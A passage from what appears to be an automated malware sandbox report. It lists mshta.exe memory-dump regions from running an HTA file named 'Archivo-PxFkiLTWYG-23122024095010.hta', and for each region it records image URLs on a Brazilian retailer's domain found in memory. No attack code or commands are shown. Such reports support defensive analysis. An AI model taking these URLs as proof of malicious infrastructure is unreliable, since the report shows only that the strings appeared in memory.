00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535775149.000000000530C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2022/12/07/291422413_392978049367464_116978390465635854
Source: mshta.exe, 00000000.00000003.538989023.0000000000705000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.000000000072D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538850057.0000000005165000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.0000000005166000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540213633.0000000005164000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539136529.0000000000706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.000000000515F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/04/27/Samsung-1P-Abril-Contrato-RJ_americanas-home
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540298823.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542885580.0000000005279000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548594202.000000000527B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540262182.000000000444A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.541042280.0000000005CF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/05/12/espacamento-10-d905af122871.png
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/05/12/espacamento-10-d905af122871.pngmeta.largemet
Source: mshta.exe, 00000000.00000003.548350262.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005E24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.00000000051B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540374546.0000000005E24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/09/29/DESK_APP-ATL-SERVICO-LEVE_PAGUE-1678818a0085
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540237396.0000000000759000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540707630.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/09/29/DESK_APP-ATL-SERVICO-OBACUPOM-2e7e4e4c39b5.p
Source: mshta.exe, 00000000.00000003.548350262.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005E24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.00000000051B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540374546.0000000005E24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/09/29/DESK_APP-ATL-SERVICO-OFERTA_DIA-c06a4ab4555a
Source: mshta.exe, 00000000.00000003.548350262.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548607709.00000000051EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_BRINQUEDOS-6b1d7bd500c5.png
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540237396.0000000000759000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005DF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_CASA-CLIMATIZACAO-6968b0c0fdaa.png
Source: mshta.exe, 00000000.00000003.537786668.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548350262.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540937966.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004494000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_CASA-ELETROPORTATEIS-bfaadadd69a1.p
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_CASA-LIVROS-c974a7d7c153.png
Source: mshta.exe, 00000000.00000003.548350262.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_CASA-LIVROS-c974a7d7c153.png2400c3.
Source: mshta.exe, 00000000.00000003.548350262.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548607709.00000000051EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_CASA-LIVROS-c974a7d7c153.pngz
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_MOVEIS-8a19bbc2275c.png
Source: mshta.exe, 00000000.00000003.537786668.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548436103.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540937966.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_MOVEIS-8a19bbc2275c.png;
Source: mshta.exe, 00000000.00000003.537786668.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_MOVEIS-8a19bbc2275c.pngcon
Source: mshta.exe, 00000000.00000003.537786668.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_MOVEIS-8a19bbc2275c.pngisp
Source: mshta.exe, 00000000.00000003.537786668.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004494000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_NOTEBOOKS-e8a0935828ab.png
Source: mshta.exe, 00000000.00000003.548350262.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548607709.00000000051EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_NOTEBOOKS-e8a0935828ab.png4
Source: mshta.exe, 00000000.00000003.548350262.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_NOTEBOOKS-e8a0935828ab.pngdd69a1.pn
Source: mshta.exe, 00000000.00000003.537786668.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548350262.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548607709.00000000051EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004494000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_TELEFONIA-53dfc973fda4.png
Source: mshta.exe, 00000000.00000003.537786668.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_TELEFONIA-53dfc973fda4.pngP=
Source: mshta.exe, 00000000.00000003.548350262.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_TV-dc4baf9a9983.png
Source: mshta.exe, 00000000.00000003.548350262.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535449726.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535199624.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535630387.0000000005308000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/06/DESK_ATL_UD-fe20595d366f.png
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005E24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004460000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540937966.0000000004481000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484331936.0000000005367000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548436103.0000000004482000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/27/432x540-416b11512524.png
Source: mshta.exe, 00000000.00000003.537786668.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548436103.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540937966.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/10/27/432x540-416b11512524.png-3ef281a2ba9f.jpg
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540237396.0000000000759000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005E24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484331936.0000000005367000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538243144.0000000000743000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/11/09/lojas_oficiais-432x540px-13e329cb6b3b.png
Source: mshta.exe, 00000000.00000003.537786668.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548436103.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540937966.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/11/09/lojas_oficiais-432x540px-13e329cb6b3b.pngpla
Source: mshta.exe, 00000000.00000003.548350262.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535727062.000000000530E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535449726.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535589591.0000000005309000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535199624.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or 